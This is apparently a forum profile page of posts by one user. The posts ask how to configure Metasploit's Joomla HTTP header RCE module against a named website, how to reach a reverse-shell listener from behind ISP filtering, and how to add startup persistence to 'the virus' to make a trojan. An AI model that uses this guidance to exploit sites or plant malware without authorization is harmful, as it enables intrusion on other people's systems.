updatesvc

Posts posted by updatesvc

  1. look for a program wrapper to force add to startup programs

    What I think you want is a trojan.

    option 2

    You can create a batch file to automatically create a shortcut of the payload.exe to the default startup folder location

    and then merge the batch file with the virus

  2. @cooper

    Thanks for replying.

    Can you be a little more specific about your answer?

    Let me explain my scenario in a bit more detail.

    http://www.joomla-target.com/joomla/ is hosted on a VPS with this IP 1.2.3.4 along with a few other websites.

    So will the setting be:

    Name       Current Setting               Required  Description
    ----       ---------------               --------  -----------
    HEADER     USER-AGENT                    yes       The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
    Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOST      1.2.3.4                       yes       The target address
    RPORT      80                            yes       The target port
    SSL        false                         no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /joomla/                      yes       The base path to the Joomla application
    VHOST      http://www.joomla-target.com  no        HTTP server virtual host

    or

    Name       Current Setting        Required  Description
    ----       ---------------        --------  -----------
    HEADER     USER-AGENT             yes       The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
    Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOST      1.2.3.4                yes       The target address
    RPORT      80                     yes       The target port
    SSL        false                  no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /joomla/               yes       The base path to the Joomla application
    VHOST      www.joomla-target.com  no        HTTP server virtual host

    I hope I am not asking too much.
  3. I am trying to exploit the common Joomla CMS application.

    Here is some info on the exploit.

    https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce

    To use the exploit in msfconsole, type:

    use exploit/multi/http/joomla_http_header_rce

    So here comes my question.

    In the options for the exploit comes my problem

    show options
    ###output below###

    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    HEADER     USER-AGENT       yes       The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOST      1.2.3.4          yes       The target address
    RPORT      80               yes       The target port
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The base path to the Joomla application
    VHOST                       no        HTTP server virtual host

    My problem is the VHOST setting. I do understand what a virtual host is (I think it is when one IP is used to host multiple domain names).

    Imagine this scenario:

    target website running Joomla is http://www.joomla-target.com/joomla/ on port 80

    domain is hosted on 1.2.3.4

    but 1.2.3.4:80 is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding)

    I hope you have understood the scenario:

    So what will be the options for

    RHOST

    TARGETURI

    VHOST

    RPORT

    Please help.

    Thanks in advance.

  4. :grin: Thanks phpsystems, for sharing

    I will try that; watching the video now.

    Here is a small snip from the ipconfig /all command when using a 3G USB dongle

    Connection-specific DNS Suffix . :
    Description . . . . . . . . . . . : HUAWEI Mobile Connect - Network Adapter #2
    Physical Address. . . . . . . . . : 58-2C-80-13-92-XX
    DHCP Enabled. . . . . . . . . . . : Yes
    Autoconfiguration Enabled . . . . : Yes
    Link-local IPv6 Address . . . . . : fe80::8c28:ca02:bfe3:648c%5(Preferred)
    IPv4 Address. . . . . . . . . . . : 154.122.xxx.71(Preferred)
    Subnet Mask . . . . . . . . . . . : 255.255.255.240
    Lease Obtained. . . . . . . . . . : Saturday, January 30, 2016 11:19:06 AM
    Lease Expires . . . . . . . . . . : Friday, February 5, 2016 11:19:07 AM
    Default Gateway . . . . . . . . . : 212.49.xxx.22
                                        154.122.xxx.65
    DHCP Server . . . . . . . . . . . : 154.122.xxx.65
    DHCPv6 IAID . . . . . . . . . . . : 794307712
    DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1E-3D-7B-3D-58-2C-80-11-91-08
    DNS Servers . . . . . . . . . . . : 212.49.xxx.22
                                        196.202.xxx.45

    At the time, my IP on whatismyip.com was 154.122.xxx.65, the same as my DHCP server and gateway but different from my IPv4 address.

    I will check back and inform you if the SSH solution worked.

  5. I am not quite sure what "actual IP" or "remote IP" means, but doing a Google search for my IP address I get this: 154.122.xxx.xxx (I am guessing this is my remote IP). That same IP is what I get running a network analyzer tool on my Android. When running traceroute commands (on google.com), something different happens:

    1st hop ***10.36.xxx.xxx I guess this one is my ISP router

    2nd hop ***10.36.xxx.xxx I guess this one is another of my ISP's routers

    3rd hop ***212.49.xxx.xxx this one shows my ISP domain name

    4th hop ***10.xxx.xxx.xxx

    -----some more gateways

    BTW I tried accessing the router pages, no luck.

    phpsystems: do you have any references or walkthrough guides for VPNs or SSH tunnelling to listen to a port?

  6. I am kind of a noob on this one.

    I have this question.

    I share internet through tethering using my phone, which is connected to the internet through the 3G network.

    I don't have any other way of accessing the internet, so no cable or wired connections.

    In the options for setting up an exploit in Metasploit, the LHOST option will not work if I set my public IP.

    This is because my ISP filters all incoming requests on all ports (the router is located at their site, no access). I would like to know if there is a way I could work around this, preferably a free method. I already know I can use a VPS (Virtual Private Server) but that's expensive.

    Possible noobie solutions: proxies, VPNs. If this is a solution I would like to know how to set up the LPORT and LHOST.

    I am sorry if this has a simple answer.

    Environment: Kali Linux version on VMware Workstation ---> hosted on a Windows machine

    Please help.
